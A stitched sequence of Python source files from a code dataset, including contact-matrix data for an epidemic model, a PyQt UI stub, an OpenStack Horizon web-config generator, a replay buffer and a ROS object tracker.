0.33813266, 0.1349378 , 0.03755396, 0.01429426, 0.01356763,
0.02551792],
[0.52762004, 0.52787011, 0.33622117, 0.43037934, 0.36416323,
0.42655672, 0.33780201, 0.13492044, 0.0798784 , 0.15795568,
0.20367727, 0.33176385, 0.12256126, 0.05573807, 0.0124446 ,
0.02190564],
[0.53741472, 0.50750067, 0.3229994 , 0.30706704, 0.21340314,
0.27424513, 0.32838657, 0.26023515, 0.13222548, 0.07284901,
0.11950584, 0.16376401, 0.25560123, 0.09269703, 0.02451284,
0.00631762],
[0.37949376, 0.55324102, 0.47449156, 0.24796638, 0.19276924,
0.20675484, 0.3267867 , 0.39525729, 0.3070043 , 0.10088992,
0.10256839, 0.13016641, 0.1231421 , 0.24067708, 0.05475668,
0.01401368],
[0.16359554, 0.48536065, 0.40533723, 0.31542539, 0.06890518,
0.15670328, 0.12884062, 0.27912381, 0.25685832, 0.20143856,
0.12497647, 0.07565566, 0.10331686, 0.08830789, 0.15657321,
0.05744065],
[0.29555039, 0.39898035, 0.60257982, 0.5009724 , 0.13799378,
0.11716593, 0.14366306, 0.31602298, 0.34691652, 0.30960511,
0.31253708, 0.14557295, 0.06065554, 0.10654772, 0.06390924,
0.09827735]])
Mu_school = np.array([[3.21885854e-001, 4.31659966e-002, 7.88269419e-003,
8.09548363e-003, 5.35038146e-003, 2.18201974e-002,
4.01633514e-002, 2.99376002e-002, 1.40680283e-002,
1.66587853e-002, 9.47774696e-003, 7.41041622e-003,
1.28200661e-003, 7.79120405e-004, 8.23608272e-066,
6.37926405e-120],
[5.40133328e-002, 4.84870697e+000, 2.70046494e-001,
3.14778450e-002, 3.11206331e-002, 8.56826951e-002,
1.08251879e-001, 9.46101139e-002, 8.63528188e-002,
5.51141159e-002, 4.19385198e-002, 1.20958942e-002,
4.77242219e-003, 1.39787217e-003, 3.47452943e-004,
8.08973738e-039],
[4.56461982e-004, 1.04840235e+000, 6.09152459e+000,
1.98915822e-001, 1.99709921e-002, 6.68319525e-002,
6.58949586e-002, 9.70851505e-002, 9.54147078e-002,
6.70538232e-002, 4.24864096e-002, 1.98701346e-002,
5.11869429e-003, 7.27320438e-004, 4.93746124e-025,
1.82153965e-004],
[2.59613205e-003, 4.73315233e-002, 1.99337834e+000,
7.20040500e+000, 8.57326037e-002, 7.90668822e-002,
8.54208542e-002, 1.10816964e-001, 8.76955236e-002,
9.22975521e-002, 4.58035025e-002, 2.51130956e-002,
5.71391798e-003, 1.07818752e-003, 6.21174558e-033,
1.70710246e-070],
[7.19158720e-003, 2.48833195e-002, 9.89727235e-003,
8.76815025e-001, 4.33963352e-001, 5.05185217e-002,
3.30594492e-002, 3.81384107e-002, 2.34709676e-002,
2.67235372e-002, 1.32913985e-002, 9.00655556e-003,
6.94913059e-004, 1.25675951e-003, 1.77164197e-004,
1.21957619e-047],
[7.04119204e-003, 1.19412206e-001, 3.75016980e-002,
2.02193056e-001, 2.79822908e-001, 1.68610223e-001,
2.86939363e-002, 3.56961469e-002, 4.09234494e-002,
3.32290896e-002, 8.12074348e-003, 1.26152144e-002,
4.27869081e-003, 2.41737477e-003, 4.63116893e-004,
1.28597237e-003],
[1.41486320e-002, 3.86561429e-001, 2.55902236e-001,
1.69973534e-001, 4.98104010e-002, 8.98122446e-002,
7.95333394e-002, 5.19274611e-002, 5.46612930e-002,
2.64567137e-002, 2.03241595e-002, 2.96263220e-003,
5.42888613e-003, 4.47585970e-004, 1.65440335e-048,
3.11189454e-055],
[2.40945305e-002, 2.11030046e-001, 1.54767246e-001,
8.17929897e-002, 1.84061608e-002, 5.43009779e-002,
7.39351186e-002, 5.21677009e-002, 5.63267084e-002,
2.51807147e-002, 3.53972554e-003, 7.96646343e-003,
5.56929776e-004, 2.08530461e-003, 1.84428290e-123,
9.69555083e-067],
[7.81313905e-003, 1.14371898e-001, 9.09011945e-002,
3.80212104e-001, 8.54533192e-003, 2.62430162e-002,
2.51880009e-002, 3.22563508e-002, 6.73506045e-002,
2.24997143e-002, 2.39241043e-002, 6.50627191e-003,
5.50892674e-003, 4.78308850e-004, 4.81213215e-068,
2.40231425e-092],
[6.55265016e-002, 2.31163536e-001, 1.49970765e-001,
5.53563093e-001, 5.74032526e-003, 3.02865481e-002,
5.72506883e-002, 4.70559232e-002, 4.28736553e-002,
2.42614518e-002, 2.86665377e-002, 1.29570473e-002,
3.24362518e-003, 1.67930318e-003, 6.20916950e-134,
3.27297624e-072],
[1.72765646e-002, 3.43744913e-001, 4.30902785e-001,
4.74293073e-001, 5.39328187e-003, 1.44128740e-002,
3.95545363e-002, 3.73781860e-002, 4.56834488e-002,
5.92135906e-002, 2.91473801e-002, 1.54857502e-002,
4.53105390e-003, 8.87272668e-024, 1.23797452e-117,
5.64262349e-078],
[6.14363036e-002, 2.98367348e-001, 2.59092700e-001,
3.00800812e-001, 5.92454596e-003, 5.26458862e-002,
2.02188672e-002, 3.27897605e-002, 4.07753741e-002,
2.83422407e-002, 2.43657809e-002, 2.73993226e-002,
8.87990718e-003, 1.13279180e-031, 7.81960493e-004,
7.62467510e-004],
[3.63695643e-002, 5.96870355e-002, 3.05072624e-002,
1.45523978e-001, 1.26062984e-002, 1.69458169e-003,
1.55127292e-002, 4.22097670e-002, 9.21792425e-003,
1.42200652e-002, 1.10967529e-002, 5.77020348e-003,
2.04474044e-002, 1.11075734e-002, 4.42271199e-067,
2.12068625e-037],
[1.67937029e-003, 2.72971001e-002, 1.05886266e-002,
7.61087735e-032, 1.97191559e-003, 1.92885006e-003,
1.24343737e-002, 5.39297787e-003, 5.41684968e-003,
8.63502071e-003, 1.94554498e-003, 1.49082274e-002,
8.11781100e-003, 1.74395489e-002, 1.11239023e-002,
3.45693088e-126],
[1.28088348e-028, 5.11065200e-026, 1.93019797e-040,
7.60476035e-003, 2.63586947e-022, 1.69749024e-024,
1.25875005e-026, 7.62109877e-003, 7.84979948e-003,
2.11516023e-002, 3.52117832e-002, 2.14360383e-002,
7.73902109e-003, 8.01328325e-003, 7.91285055e-003,
2.13825814e-002],
[2.81655586e-094, 2.11305187e-002, 8.46562506e-042,
2.12592841e-002, 4.89802057e-036, 7.59232387e-003,
9.77247001e-069, 2.23108239e-060, 1.43715978e-048,
8.56015694e-060, 4.69469043e-042, 1.59822047e-046,
2.20978550e-083, 8.85861277e-107, 1.02042815e-080,
6.61413913e-113]])
Mu_work = np.array([[0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 0.00000000e+000, 0.00000000e+000,
0.00000000e+000, 8.20604524e-092, 1.20585150e-005,
3.16436834e-125],
[0.00000000e+000, 1.16840561e-003, 9.90713236e-072,
4.42646396e-059, 2.91874286e-006, 9.98773031e-003,
2.58779981e-002, 5.66104376e-003, 2.12699812e-002,
5.72117462e-003, 1.48212306e-003, 1.23926126e-003,
1.28212945e-056, 1.34955578e-005, 7.64591325e-079,
2.38392073e-065],
[0.00000000e+000, 2.56552144e-003, 1.12756182e-001,
2.40351143e-002, 2.62981485e-002, 7.56512432e-003,
6.19587609e-002, 1.73269871e-002, 5.87405128e-002,
3.26749742e-002, 1.24709193e-002, 2.93054408e-008,
3.71596993e-017, 2.79780317e-053, 4.95800770e-006,
3.77718083e-102],
[0.00000000e+000, 1.07213881e-002, 4.28390448e-002,
7.22769090e-001, 5.93479736e-001, 3.39341952e-001,
3.17013715e-001, 2.89168861e-001, 3.11143180e-001,
2.34889238e-001, 1.32953769e-001, 6.01944097e-002,
1.47306181e-002, 8.34699602e-006, 2.85972822e-006,
1.88926122e-031],
[0.00000000e+000, 9.14252587e-003, 5.74508682e-002,
4.00000235e-001, 7.93386618e-001, 7.55975146e-001,
6.32277283e-001, 6.83601459e-001, 4.98506972e-001,
3.82309992e-001, 2.81363576e-001, 1.23338103e-001,
4.15708021e-002, 9.86113407e-006, 1.32609387e-005,
3.74318048e-006],
[0.00000000e+000, 1.04243481e-002, 7.34587492e-002,
3.49556755e-001, 7.50680101e-001, 1.25683393e+000,
9.01245714e-001, 8.63446835e-001, 7.70443641e-001,
5.17237071e-001, 4.09810981e-001, 1.80645400e-001,
5.51284783e-002, 1.60674627e-005, 1.01182608e-005,
3.01442534e-006],
[0.00000000e+000, 1.65842404e-002, 8.34076781e-002,
1.89301935e-001, 5.21246906e-001, 8.54460001e-001,
1.12054931e+000, 9.64310078e-001, 8.34675180e-001,
6.52534012e-001, 3.79383514e-001, 2.11198205e-001,
5.17285688e-002, 1.63795563e-005, 4.10100851e-006,
3.49478980e-006],
[0.00000000e+000, 1.11666639e-002, 5.03319748e-002,
3.70510313e-001, 4.24294782e-001, 7.87535547e-001,
8.45085693e-001, 1.14590365e+000, 1.07673077e+000,
7.13492115e-001, 5.00740004e-001, 1.90102207e-001,
3.59740115e-002, 1.22988530e-005, 9.13512833e-006,
6.02097416e-006],
[0.00000000e+000, 6.07792440e-003, 5.49337607e-002,
2.23499535e-001, 4.82353827e-001, 7.52291991e-001,
8.89187601e-001, 9.33765370e-001, 1.10492283e+000,
8.50124391e-001, 5.88941528e-001, 1.94947085e-001,
5.09477228e-002, 1.43626161e-005, 1.02721567e-005,
1.29503893e-005],
[0.00000000e+000, 3.31622551e-003, 7.01829848e-002,
2.67512972e-001, 3.14796392e-001, 5.41516885e-001,
6.95769048e-001, 7.50620518e-001, 7.50038547e-001,
7.00954088e-001, 4.35197983e-001, 2.11283335e-001,
3.88576200e-002, 1.62810370e-005, 1.08243610e-005,
6.09172339e-006],
[0.00000000e+000, 4.39576425e-004, 7.17737968e-002,
1.89254612e-001, 2.47832532e-001, 5.16027731e-001,
6.02783971e-001, 6.15949277e-001, 8.05581107e-001,
7.44063535e-001, 5.44855374e-001, 2.52198706e-001,
4.39235685e-002, 1.18079721e-005, 1.18226645e-005,
1.01613165e-005],
[0.00000000e+000, 4.91737561e-003, 1.08686672e-001,
1.24987806e-001, 1.64110983e-001, 3.00118829e-001,
4.18159745e-001, 3.86897613e-001, 4.77718241e-001,
3.60854250e-001, 3.22466456e-001, 1.92516925e-001,
4.07209694e-002, 1.34978304e-005, 6.58739925e-006,
6.65716756e-006],
[0.00000000e+000, 6.35447018e-004, 3.96329620e-002,
1.83072502e-002, 7.04596701e-002, 1.24861117e-001,
1.37834574e-001, 1.59845720e-001, 1.66933479e-001,
1.56084857e-001, 1.14949158e-001, 8.46570798e-002,
1.50879843e-002, 2.03019580e-005, 8.26102156e-006,
1.48398182e-005],
[7.60299521e-006, 3.36326754e-006, 7.64855296e-006,
2.27621532e-005, 3.14933351e-005, 7.89308410e-005,
7.24212842e-005, 2.91748203e-005, 6.61873732e-005,
5.95693238e-005, 7.70713500e-005, 5.30687748e-005,
4.66030117e-005, 1.41633235e-005, 2.49066205e-005,
1.19109038e-005],
[5.78863840e-055, 7.88785149e-042, 2.54830412e-006,
2.60648191e-005, 1.68036205e-005, 2.12446739e-005,
3.57267603e-005, 4.02377033e-005, 3.56401935e-005,
3.09769252e-005, 2.13053382e-005, 4.49709414e-005,
2.61368373e-005, 1.68266203e-005, 1.66514322e-005,
2.60822813e-005],
[2.35721271e-141, 9.06871674e-097, 1.18637122e-089,
9.39934076e-022, 4.66000452e-005, 4.69664011e-005,
4.69316082e-005, 8.42184044e-005, 2.77788168e-005,
1.03294378e-005, 1.06803618e-005, 7.26341826e-075,
1.10073971e-065, 1.02831671e-005, 5.16902994e-049,
8.28040509e-043]])
# "Other locations" contact matrix: mean daily contacts between 16 five-year
# age bands outside home/school/work.  NOTE(review): orientation assumed to
# match the other Mu_* matrices used by generate_reduced_matrices -- confirm
# against the upstream source of these matrices.
Mu_other = np.array([[0.95537734, 0.46860132, 0.27110607, 0.19447667, 0.32135073,
                      0.48782072, 0.54963024, 0.42195593, 0.27152038, 0.17864251,
                      0.20155642, 0.16358271, 0.1040159 , 0.0874149 , 0.05129938,
                      0.02153823],
                     [0.51023519, 2.17757364, 0.9022516 , 0.24304235, 0.20119518,
                      0.39689588, 0.47242431, 0.46949918, 0.37741651, 0.16843746,
                      0.12590504, 0.12682331, 0.11282247, 0.08222718, 0.03648526,
                      0.02404257],
                     [0.18585796, 1.11958124, 4.47729443, 0.67959759, 0.43936317,
                      0.36934142, 0.41566744, 0.44467286, 0.48797422, 0.28795385,
                      0.17659191, 0.10674831, 0.07175567, 0.07249261, 0.04815305,
                      0.03697862],
                     [0.09854482, 0.3514869 , 1.84902386, 5.38491613, 1.27425161,
                      0.59242579, 0.36578735, 0.39181798, 0.38131832, 0.31501028,
                      0.13275648, 0.06408612, 0.04499218, 0.04000664, 0.02232326,
                      0.01322698],
                     [0.13674436, 0.1973461 , 0.33264088, 2.08016394, 3.28810184,
                      1.29198125, 0.74642201, 0.44357051, 0.32781391, 0.35511243,
                      0.20132011, 0.12961 , 0.04994553, 0.03748657, 0.03841073,
                      0.02700581],
                     [0.23495203, 0.13839031, 0.14085679, 0.5347385 , 1.46021275,
                      1.85222022, 1.02681162, 0.61513602, 0.39086271, 0.32871844,
                      0.25938947, 0.13520412, 0.05101963, 0.03714278, 0.02177751,
                      0.00979745],
                     [0.23139098, 0.18634831, 0.32002214, 0.2477269 , 0.64111274,
                      0.93691022, 1.14560725, 0.73176025, 0.43760432, 0.31057135,
                      0.29406937, 0.20632155, 0.09044896, 0.06448983, 0.03041877,
                      0.02522842],
                     [0.18786196, 0.25090485, 0.21366969, 0.15358412, 0.35761286,
                      0.62390736, 0.76125666, 0.82975354, 0.54980593, 0.32778339,
                      0.20858991, 0.1607099 , 0.13218526, 0.09042909, 0.04990491,
                      0.01762718],
                     [0.12220241, 0.17968132, 0.31826246, 0.19846971, 0.34823183,
                      0.41563737, 0.55930999, 0.54070187, 0.5573184 , 0.31526474,
                      0.20194048, 0.09234293, 0.08377534, 0.05819374, 0.0414762 ,
                      0.01563101],
                     [0.03429527, 0.06388018, 0.09407867, 0.17418896, 0.23404519,
                      0.28879108, 0.34528852, 0.34507961, 0.31461973, 0.29954426,
                      0.21759668, 0.09684718, 0.06596679, 0.04274337, 0.0356891 ,
                      0.02459849],
                     [0.05092152, 0.10829561, 0.13898902, 0.2005828 , 0.35807132,
                      0.45181815, 0.32281821, 0.28014803, 0.30125545, 0.31260137,
                      0.22923948, 0.17657382, 0.10276889, 0.05555467, 0.03430327,
                      0.02064256],
                     [0.06739051, 0.06795035, 0.0826437 , 0.09522087, 0.23309189,
                      0.39055444, 0.39458465, 0.29290532, 0.27204846, 0.17810118,
                      0.24399007, 0.22146653, 0.13732849, 0.07585801, 0.03938794,
                      0.0190908 ],
                     [0.04337917, 0.05375367, 0.05230119, 0.08066901, 0.16619572,
                      0.25423056, 0.25580913, 0.27430323, 0.22478799, 0.16909017,
                      0.14284879, 0.17211604, 0.14336033, 0.10344522, 0.06797049,
                      0.02546014],
                     [0.04080687, 0.06113728, 0.04392062, 0.04488748, 0.12808591,
                      0.19886058, 0.24542711, 0.19678011, 0.17800136, 0.13147441,
                      0.13564091, 0.14280335, 0.12969805, 0.11181631, 0.05550193,
                      0.02956066],
                     [0.01432324, 0.03441212, 0.05604694, 0.10154456, 0.09204 ,
                      0.13341443, 0.13396901, 0.16682638, 0.18562675, 0.1299677 ,
                      0.09922375, 0.09634331, 0.15184583, 0.13541738, 0.1169359 ,
                      0.03805293],
                     [0.01972631, 0.02274412, 0.03797545, 0.02036785, 0.04357298,
                      0.05783639, 0.10706321, 0.07688271, 0.06969759, 0.08029393,
                      0.05466604, 0.05129046, 0.04648653, 0.06132882, 0.05004289,
                      0.03030569]])
def generate_reduced_matrices(age_sep, Ni):
    '''
    Aggregate the 16-band contact matrices into coarser age groups.

    Receives the age separation points and the populations and builds the
    population-weighted average contact matrices, returning an array of
    shape (4, len(age_sep)+1, len(age_sep)+1) with the 4 partial contact
    matrices in the order: house, school, work, other.

    Parameters
    ----------
    age_sep : sequence of float
        Increasing age cut points; they define len(age_sep)+1 groups.
    Ni : numpy.ndarray
        Population of each of the 16 five-year age bands (same grid as
        ages_Mu_min and the Mu_* matrices).

    Returns
    -------
    numpy.ndarray
        (4, nMat, nMat) array of the reduced contact matrices.

    Notes
    -----
    A group whose total population is zero divides by zero (unchanged
    from the original behaviour).
    '''
    nMat = len(age_sep) + 1
    # Indices of the 5-year bands falling inside each aggregated group.
    age_indexes = [np.flatnonzero(ages_Mu_min <= age_sep[0])]
    for i in range(1, len(age_sep)):
        # '&' is the element-wise boolean AND (the original used '*',
        # which is equivalent for boolean arrays but less idiomatic).
        age_indexes.append(np.flatnonzero((ages_Mu_min > age_sep[i - 1])
                                          & (ages_Mu_min <= age_sep[i])))
    age_indexes.append(np.flatnonzero(ages_Mu_min > age_sep[-1]))

    # Iterate the four settings once instead of duplicating the weighted
    # average expression per matrix.
    matrices = (Mu_house, Mu_school, Mu_work, Mu_other)
    Ms = np.empty((len(matrices), nMat, nMat))
    for i in range(nMat):
        Nia = Ni[age_indexes[i]]
        Na = Nia.sum()
        for j in range(nMat):
            # np.ix_ selects the (rows, cols) sub-block in a single
            # indexing step instead of two chained fancy-index copies.
            block = np.ix_(age_indexes[i], age_indexes[j])
            for k, Mu in enumerate(matrices):
                Ms[k, i, j] = (Nia * Mu[block].sum(axis=1)).sum() / Na
    return Ms
#ts, X = call_ODE(X0, tmax, betas, param, tcorte=tcorte)
#plt.plot(ts, X[:,:2], '.-')
| 48.936267 | 152 | 0.593135 |
a1fac0722dfead6d7d06eddcce884f4ba1c9a684 | 2,447 | py | Python | src/fogml/generators/knn_code_generator.py | bkulawska/FogML | fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a | [
"Apache-2.0"
] | null | null | null | src/fogml/generators/knn_code_generator.py | bkulawska/FogML | fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a | [
"Apache-2.0"
] | null | null | null | src/fogml/generators/knn_code_generator.py | bkulawska/FogML | fdcb2f0bf759f1994a6f788e9e60dd2d3b65919a | [
"Apache-2.0"
] | null | null | null | import numpy as np
import os
from sklearn.neighbors import KNeighborsClassifier
from .base_generator import BaseGenerator
| 34.957143 | 91 | 0.585206 |
a1fbd1b0e28715e9bf42d61fcecc21a928f44f08 | 8,719 | py | Python | modules/plugins/__init__.py | sungkomp/sambro | 4618d785d03424d122206d88d9ebfb6971486e2c | [
"MIT"
] | 5 | 2017-02-03T16:29:43.000Z | 2018-12-17T15:43:36.000Z | modules/plugins/__init__.py | sungkomp/sambro | 4618d785d03424d122206d88d9ebfb6971486e2c | [
"MIT"
] | 84 | 2016-04-11T12:47:42.000Z | 2019-05-27T03:46:09.000Z | modules/plugins/__init__.py | sungkomp/sambro | 4618d785d03424d122206d88d9ebfb6971486e2c | [
"MIT"
] | 3 | 2016-11-29T15:27:18.000Z | 2019-10-15T02:46:45.000Z | # -*- coding: utf-8 -*-
import os
import sys
from gluon import current
from gluon.storage import Storage
__all__ = ("PluginLoader",
)
# Name of the plugin directory in modules
PLUGINS = "plugins"
# Module names to ignore when scanning for plugins
IGNORE = ("skeleton", "__init__")
# Name of the setup function in plugins
SETUP = "setup"
# Name of the variable that contains the version info in plugins
VERSION = "__version__"
# =============================================================================
# =============================================================================
# Do a full scan when reloading the module (=when the thread starts)
PluginLoader.detect(reset_all=True)
# =============================================================================
| 31.02847 | 83 | 0.513476 |
a1fbde784a20640d80d64437aa8dd036428fff1c | 15,105 | py | Python | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ccm.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
| 57 | 112 | 0.732539 |
a1fe7d59bcfb1477b00dec04a015c0d87e23fbf2 | 11,758 | py | Python | openstack_dashboard/management/commands/make_web_conf.py | wilk/horizon | bdf7e692227367a928325acdd31088971d3c4ff4 | [
"Apache-2.0"
] | 1 | 2019-08-07T08:46:03.000Z | 2019-08-07T08:46:03.000Z | openstack_dashboard/management/commands/make_web_conf.py | wilk/horizon | bdf7e692227367a928325acdd31088971d3c4ff4 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | openstack_dashboard/management/commands/make_web_conf.py | wilk/horizon | bdf7e692227367a928325acdd31088971d3c4ff4 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import multiprocessing
import os
import re
import socket
import subprocess
import sys
import warnings
import six
from django.conf import settings
from django.core.management import base
from django import template
# Suppress DeprecationWarnings which clutter the output to the point of
# rendering it unreadable.
warnings.simplefilter('ignore')
cmd_name = __name__.split('.')[-1]
CURDIR = os.path.realpath(os.path.dirname(__file__))
PROJECT_PATH = os.path.realpath(os.path.join(CURDIR, '../..'))
STATIC_PATH = os.path.realpath(os.path.join(PROJECT_PATH, '../static'))
# Known apache regular expression to retrieve it's version
APACHE_VERSION_REG = r'Apache/(?P<version>[\d.]*)'
# Known apache commands to retrieve it's version
APACHE2_VERSION_CMDS = (
(('/usr/sbin/apache2ctl', '-V'), APACHE_VERSION_REG),
(('/usr/sbin/apache2', '-v'), APACHE_VERSION_REG),
)
# Known apache log directory locations
APACHE_LOG_DIRS = (
'/var/log/httpd', # RHEL / Red Hat / CentOS / Fedora Linux
'/var/log/apache2', # Debian / Ubuntu Linux
)
# Default log directory
DEFAULT_LOG_DIR = '/var/log'
def _getattr(obj, name, default):
"""Like getattr but return `default` if None or False.
By default, getattr(obj, name, default) returns default only if
attr does not exist, here, we return `default` even if attr evaluates to
None or False.
"""
value = getattr(obj, name, default)
if value:
return value
else:
return default
context = template.Context({
'DJANGO_SETTINGS_MODULE': os.environ['DJANGO_SETTINGS_MODULE'],
'HOSTNAME': socket.getfqdn(),
'PROJECT_PATH': os.path.realpath(
_getattr(settings, 'ROOT_PATH', PROJECT_PATH)),
'STATIC_PATH': os.path.realpath(
_getattr(settings, 'STATIC_ROOT', STATIC_PATH)),
'SSLCERT': '/etc/pki/tls/certs/ca.crt',
'SSLKEY': '/etc/pki/tls/private/ca.key',
'CACERT': None,
'PROCESSES': multiprocessing.cpu_count() + 1,
})
context['PROJECT_ROOT'] = os.path.dirname(context['PROJECT_PATH'])
context['PROJECT_DIR_NAME'] = os.path.basename(
context['PROJECT_PATH'].split(context['PROJECT_ROOT'])[1])
context['PROJECT_NAME'] = context['PROJECT_DIR_NAME']
context['DEFAULT_WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'wsgi.py')
context['WSGI_FILE'] = os.path.join(
context['PROJECT_PATH'], 'horizon_wsgi.py')
VHOSTNAME = context['HOSTNAME'].split('.')
VHOSTNAME[0] = context['PROJECT_NAME']
context['VHOSTNAME'] = '.'.join(VHOSTNAME)
if len(VHOSTNAME) > 1:
context['DOMAINNAME'] = '.'.join(VHOSTNAME[1:])
else:
context['DOMAINNAME'] = 'openstack.org'
context['ADMIN'] = 'webmaster@%s' % context['DOMAINNAME']
context['ACTIVATE_THIS'] = None
virtualenv = os.environ.get('VIRTUAL_ENV')
if virtualenv:
activate_this = os.path.join(
virtualenv, 'bin/activate_this.py')
if os.path.exists(activate_this):
context['ACTIVATE_THIS'] = activate_this
# Try to detect apache's version
# We fallback on 2.4.
context['APACHE2_VERSION'] = 2.4
APACHE2_VERSION = None
for cmd in APACHE2_VERSION_CMDS:
if os.path.exists(cmd[0][0]):
try:
reg = re.compile(cmd[1])
output = subprocess.check_output(cmd[0], stderr=subprocess.STDOUT)
if isinstance(output, six.binary_type):
output = output.decode()
res = reg.search(output)
if res:
APACHE2_VERSION = res.group('version')
break
except subprocess.CalledProcessError:
pass
if APACHE2_VERSION:
ver_nums = APACHE2_VERSION.split('.')
if len(ver_nums) >= 2:
try:
context['APACHE2_VERSION'] = float('.'.join(ver_nums[:2]))
except ValueError:
pass
context['LOGDIR'] = find_apache_log_dir()
| 35.203593 | 78 | 0.58743 |
a1fe9f599cc2d428cbcc60b9598dd9359a4d7d5f | 1,107 | py | Python | codes/convergence_elasticity_advection/meshManager.py | adRenaud/research | 2f0062a1800d7a17577bbfc2393b084253d567f4 | [
"MIT"
] | 1 | 2021-06-18T14:52:03.000Z | 2021-06-18T14:52:03.000Z | codes/convergence_elasticity/meshManager.py | adRenaud/research | 2f0062a1800d7a17577bbfc2393b084253d567f4 | [
"MIT"
] | 1 | 2019-01-07T13:11:11.000Z | 2019-01-07T13:11:11.000Z | codes/convergence_elasticity_advection/meshManager.py | adRenaud/research | 2f0062a1800d7a17577bbfc2393b084253d567f4 | [
"MIT"
] | null | null | null | # !/usr/bin/python
import numpy as np
import math as m
| 22.14 | 76 | 0.532972 |
a1fedb42ea7da198208259c1cf29d8481af7dd8f | 3,202 | py | Python | exarl/agents/agent_vault/_prioritized_replay.py | schr476/EXARL | 7f4596bd8b3d7960aaf52bc677ceac4f37029834 | [
"BSD-3-Clause"
] | 2 | 2022-02-03T20:33:17.000Z | 2022-02-10T22:43:32.000Z | exarl/agents/agent_vault/_prioritized_replay.py | schr476/EXARL | 7f4596bd8b3d7960aaf52bc677ceac4f37029834 | [
"BSD-3-Clause"
] | 40 | 2022-01-25T18:03:12.000Z | 2022-03-31T21:43:32.000Z | exarl/agents/agent_vault/_prioritized_replay.py | schr476/EXARL | 7f4596bd8b3d7960aaf52bc677ceac4f37029834 | [
"BSD-3-Clause"
] | 1 | 2022-02-10T14:33:30.000Z | 2022-02-10T14:33:30.000Z | import random
import numpy as np
import tensorflow as tf
from collections import deque
| 32.673469 | 119 | 0.628045 |
b8009f8fd07294eb10166608312734f91397abd7 | 5,722 | py | Python | rmtt_tracker/scripts/roi_tracker.py | cavayangtao/rmtt_ros | e89383510373e9ff9c8bb5c43ae719ca575ef2f5 | [
"BSD-3-Clause"
] | null | null | null | rmtt_tracker/scripts/roi_tracker.py | cavayangtao/rmtt_ros | e89383510373e9ff9c8bb5c43ae719ca575ef2f5 | [
"BSD-3-Clause"
] | null | null | null | rmtt_tracker/scripts/roi_tracker.py | cavayangtao/rmtt_ros | e89383510373e9ff9c8bb5c43ae719ca575ef2f5 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
# coding=utf-8
# pip install opencv_contrib_python
# tianbot_mini/image_raw/compressed
# roi
import sys
import os
import rospy
import sensor_msgs.msg
from cv_bridge import CvBridge
import cv2
import numpy as np
from sensor_msgs.msg import RegionOfInterest as ROI
from sensor_msgs.msg import CompressedImage
br = CvBridge()
def compressed_detect_and_draw(compressed_imgmsg):
global br,gFrame,gCapStatus,getFrame,loopGetFrame
if ((getFrame == True) or (loopGetFrame == True)):
gFrame = br.compressed_imgmsg_to_cv2(compressed_imgmsg, "bgr8")
gCapStatus = True
getFrame = True
gFrame = np.zeros((640,640,3), np.uint8)
gCapStatus = False
getFrame = True
loopGetFrame = False
if __name__ == '__main__':
rospy.init_node('tbm_tld_tracker_node')
rospy.Subscriber("/image_raw", sensor_msgs.msg.CompressedImage, compressed_detect_and_draw)
pub = rospy.Publisher("roi",ROI,queue_size=10)
tld_roi = ROI()
# rate = rospy.Rate(10)
# rate.sleep()
#
print(" n y ROI")
while True:
_key = cv2.waitKey(0) & 0xFF
if(_key == ord('n')):
# gCapStatus,gFrame = gVideoDevice.read()
getFrame = True
if(_key == ord('y')):
break
cv2.imshow("Pick frame",gFrame)
# region of interest
cv2.destroyWindow("Pick frame")
gROI = cv2.selectROI("ROI frame",gFrame,False)
if (not gROI):
print("")
quit()
#
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame,gROI)
#
while not rospy.is_shutdown():
# gCapStatus, gFrame = gVideoDevice.read()
loopGetFrame = True
if(gCapStatus):
#
_item = gTracker.track(gFrame)
cv2.imshow("Track result",_item.getFrame())
if _item.getMessage():
#
print(_item.getMessage())
_key = cv2.waitKey(1) & 0xFF
if (_key == ord('q')) | (_key == 27):
break
if (_key == ord('r')) :
# ROI
print("ROI")
gTracker = Tracker(tracker_type="TLD")
gTracker.initWorking(gFrame, gROI)
else:
print("")
quit()
| 31.097826 | 113 | 0.54072 |
b80101fcb0f7ec764004534f9989b58dc2d327bf | 4,236 | py | Python | api-scanner/method_analysis_job.py | ybqdren/Python-JavaAPI-Scanner | 69e2de07c95a8edf526dfb4b8eb14deec5693061 | [
"Apache-2.0"
] | null | null | null | api-scanner/method_analysis_job.py | ybqdren/Python-JavaAPI-Scanner | 69e2de07c95a8edf526dfb4b8eb14deec5693061 | [
"Apache-2.0"
] | null | null | null | api-scanner/method_analysis_job.py | ybqdren/Python-JavaAPI-Scanner | 69e2de07c95a8edf526dfb4b8eb14deec5693061 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# @Author: ZhaoWen <withzhaowen@126.com>
# @Date: 2021/1/2
# @GiteePath: https://gitee.com/openeuler2020/team-1186152014
from method_analysis_utils.scanner import get_scanner,token_type
import os
import logging.config
from method_analysis_utils.complier import get_complier
#
logging.config.fileConfig('logging.conf')
logger = logging.getLogger()
